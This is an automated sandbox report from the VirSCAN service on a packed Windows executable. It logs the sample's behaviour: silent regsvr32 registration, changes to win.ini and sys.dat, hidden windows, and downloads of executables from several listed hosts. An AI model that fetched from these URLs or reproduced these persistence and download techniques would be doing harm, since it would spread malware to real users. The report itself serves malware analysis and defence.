VirSCAN VirSCAN

1, You can UPLOAD any files, but there is 20Mb limit per file.
2, VirSCAN supports Rar/Zip decompression, but it must be less than 20 files.
3, VirSCAN can scan compressed files with password 'infected' or 'virus'.

Language
Server load
Server Load

文件信息
安全评分 :60
基本信息
MD5:e3c1f368d6927b2d1bcdd6e65b0de5a3
文件类型:EXE
出品公司:
版本:
壳或编译器信息:PACKER:UPX V2.00-V3.00 -> Markus Oberhumer & Laszlo Molnar & John Reiser *
子文件信息:upx30_a4d483f6dumpFile / bf68e0efb34e56ab2681233661840aab / EXE
关键行为
行为描述:写权限映射文件
详情信息:CiceroSharedMemDefaultS-*
DfSharedHeap3D40C7
DFMap0-4014305
DfRoot0003D40C7
行为描述:设置特殊文件夹属性
详情信息:C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5
C:\Documents and Settings\Administrator\Local Settings\History
C:\Documents and Settings\Administrator\Local Settings\History\History.IE5
C:\Documents and Settings\Administrator\Cookies
行为描述:隐藏指定窗口
详情信息:[Window,Class] = [csdfasdf,ThunderRT6Main]
[Window,Class] = [,ThunderRT6FormDC]
行为描述:设置线程上下文
详情信息:C:\WINDOWS\system32\ntvdm.exe
进程行为
行为描述:隐藏窗口创建进程
详情信息:ImagePath = , CmdLine = regsvr32 /s "c:\windows\system32\mswinsck.ocx"
ImagePath = , CmdLine = regsvr32 /s "c:\docume~1\admini~1\locals~1\temp\~dfa3515.tmp"
行为描述:创建进程
详情信息:ImagePath = C:\WINDOWS\system32\ntvdm.exe, CmdLine = "C:\WINDOWS\system32\ntvdm.exe" -f -i1 -o
ImagePath = C:\WINDOWS\system32\regsvr32.exe, CmdLine = regsvr32 /s "C:\WINDOWS\system32\mswinsck.ocx"
ImagePath = C:\WINDOWS\system32\regsvr32.exe, CmdLine = regsvr32 /s "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\~DFA3515.tmp"
行为描述:设置线程上下文
详情信息:C:\WINDOWS\system32\ntvdm.exe
行为描述:枚举进程
详情信息:N/A
文件行为
行为描述:写权限映射文件
详情信息:CiceroSharedMemDefaultS-*
DfSharedHeap3D40C7
DFMap0-4014305
DfRoot0003D40C7
行为描述:设置特殊文件夹属性
详情信息:C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5
C:\Documents and Settings\Administrator\Local Settings\History
C:\Documents and Settings\Administrator\Local Settings\History\History.IE5
C:\Documents and Settings\Administrator\Cookies
行为描述:修改文件内容
详情信息:C:\WINDOWS\sys.dat---> Offset = 0
C:\WINDOWS\sys.dat---> Offset = 450
C:\WINDOWS\system32\xvqcv.exe---> Offset = 12288
C:\WINDOWS\win.ini---> Offset = 0
C:\WINDOWS\win.ini---> Offset = 492
C:\WINDOWS\sys.dat---> Offset = 162
C:\WINDOWS\Temp\scs3.tmp---> Offset = 36
C:\WINDOWS\sys.dat---> Offset = 408
C:\WINDOWS\Temp\scs4.tmp---> Offset = 77
C:\WINDOWS\sys.dat---> Offset = 1226
C:\WINDOWS\sys.dat---> Offset = 1264
C:\WINDOWS\sys.dat---> Offset = 2938
C:\WINDOWS\sys.dat---> Offset = 2940
C:\WINDOWS\sys.dat---> Offset = 3406
C:\WINDOWS\sys.dat---> Offset = 3916
行为描述:查找文件
详情信息:FileName = C:\WINDOWS\system32\xvqcv.exe
FileName = C:\WINDOWS\system32\xvqcv.exebak
FileName = C:\WINDOWS
FileName = C:\WINDOWS\system32
FileName = C:\WINDOWS\sys.dat
FileName = C:\WINDOWS\system32\mswinsck.ocx
FileName = C:*.*
FileName = C:\MSDOS.SYS
FileName = C:\IO.SYS
FileName = C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\~DFA3515.tmp
FileName = C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp
FileName = C:\DOCUME~1
FileName = C:\DOCUME~1\ADMINI~1
FileName = C:\DOCUME~1\ADMINI~1\LOCALS~1
FileName = C:\Documents and Settings
行为描述:创建可执行文件
详情信息:C:\WINDOWS\system32\mswinsck.ocx
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\~DFA3515.tmp
网络行为
行为描述:联网打开网址
详情信息:InternetOpenUrlA: http://www.zgwm.net/ahjw-hnhnrwdong.txt hInternet = 0x0000067c
行为描述:下载文件
详情信息:URLDownloadToFileW: http://www.zgwm.net/ahjw-hnhnrwdong.exe ---> C:\WINDOWS\system32\xvqcv.exebak
C:\WINDOWS\system32\xvqcv.exebak
URLDownloadToFileW: http://www.pc918.net/file.txt ---> C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\DFA8130.tmp
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\DFA8130.tmp
URLDownloadToFileW: http://www.yswm.net/file.txt ---> C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\DFA8130.tmp
URLDownloadToFileW: http://www.v138.net/file.txt ---> C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\DFA8130.tmp
URLDownloadToFileW: http://www.v345.net/file.txt ---> C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\DFA8130.tmp
URLDownloadToFileW: http://www.ahwm.net/file.txt ---> C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\DFA8130.tmp
URLDownloadToFileW: http://user.yswm.net/yswm/hnhnrwdong.ini ---> C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\4537.dat
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\4537.dat
行为描述:读取网络文件
详情信息:hFile = 0x0000067c, BytesToRead =256, BytesRead = 256.
注册表行为
行为描述:删除注册表键
详情信息:\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{248DD896-BB45-11CF-9ABC-0080C7E7B78D}
\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{248DD897-BB45-11CF-9ABC-0080C7E7B78D}
行为描述:删除注册表键值
详情信息:\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{248DD897-BB45-11CF-9ABC-0080C7E7B78D}\InprocServer32\ThreadingModel
行为描述:修改注册表
详情信息:\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{248DD896-BB45-11CF-9ABC-0080C7E7B78D}\
\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{248DD896-BB45-11CF-9ABC-0080C7E7B78D}\InprocServer32\
\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{248DD896-BB45-11CF-9ABC-0080C7E7B78D}\InprocServer32\ThreadingModel
\REGISTRY\MACHINE\SOFTWARE\Classes\MSWinsock.Winsock\
\REGISTRY\MACHINE\SOFTWARE\Classes\MSWinsock.Winsock\CLSID\
\REGISTRY\MACHINE\SOFTWARE\Classes\MSWinsock.Winsock\CurVer\
\REGISTRY\MACHINE\SOFTWARE\Classes\MSWinsock.Winsock.1\
\REGISTRY\MACHINE\SOFTWARE\Classes\MSWinsock.Winsock.1\CLSID\
\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{248DD896-BB45-11CF-9ABC-0080C7E7B78D}\VersionIndependentProgID\
\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{248DD896-BB45-11CF-9ABC-0080C7E7B78D}\ProgID\
\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{248DD896-BB45-11CF-9ABC-0080C7E7B78D}\TypeLib\
\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{248DD896-BB45-11CF-9ABC-0080C7E7B78D}\Version\
\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{248DD896-BB45-11CF-9ABC-0080C7E7B78D}\MiscStatus\
\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{248DD896-BB45-11CF-9ABC-0080C7E7B78D}\MiscStatus\1\
\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{248DD896-BB45-11CF-9ABC-0080C7E7B78D}\ToolboxBitmap32\
其他行为
行为描述:创建互斥体
详情信息:CTF.LBES.MutexDefaultS-*
CTF.Compart.MutexDefaultS-*
CTF.Asm.MutexDefaultS-*
CTF.Layouts.MutexDefaultS-*
CTF.TMD.MutexDefaultS-*
CTF.TimListCache.FMPDefaultS-*MUTEX.DefaultS-*
SHIMLIB_LOG_MUTEX
行为描述:隐藏指定窗口
详情信息:[Window,Class] = [csdfasdf,ThunderRT6Main]
[Window,Class] = [,ThunderRT6FormDC]
行为描述:查找指定窗口
详情信息:NtUserFindWindowEx: [Class,Window] = [ConsoleWindowClass,ntvdm-824.828.3c0002]
运行截图
VirSCAN

About VirSCAN | Privacy Policy | Contact us | link | Help VirSCAN
Translated by Keith Miller, United States
Powered By CentOSpol

京ICP备11007605号-12

pol

京公网安备 11010802020746号